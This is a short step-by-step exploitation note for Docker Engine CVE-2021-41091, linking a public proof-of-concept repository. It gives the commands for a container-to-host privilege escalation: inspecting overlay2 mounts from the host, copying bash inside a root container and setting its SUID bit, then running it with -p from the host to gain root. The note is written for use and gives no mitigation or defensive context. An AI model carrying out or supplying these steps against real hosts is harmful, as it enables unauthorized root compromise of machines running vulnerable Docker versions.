Moby Docker Engine CVE-2021-41091

Repo: https://github.com/UncleJ4ck/CVE-2021-41091

Requirements:

1) Root Access in the container

2) Docker is version below < 20.10.9

Steps:

1) Confirm if the docker version is vulnerable

Host shell: docker --version 

2) Display the mounts connected to the system, inclusing those used by Docker containers

Host shell: findmnt 

3) Also verify within the container

Containerised root shell: mount

4) Check if we have access to the container as the low privileged user from the host OS

Host shell: cd /var/lib/docker/overlay2/cewdfbnkwejfwe98f67w8e/merged && ls -la 

5) Abuse root privileges within the container to give SUID bit to bash binary

Containerised root shell: cp /bin/bash /

Containerised root shell: chmod u+s /bash 

6) Gain root on the host OS

Host shell: /var/lib/docker/overlay2/cewdfbnkwejfwe98f67w8e/merged/bash -p 

TIP: You can use the PoC exploit for further ease of use.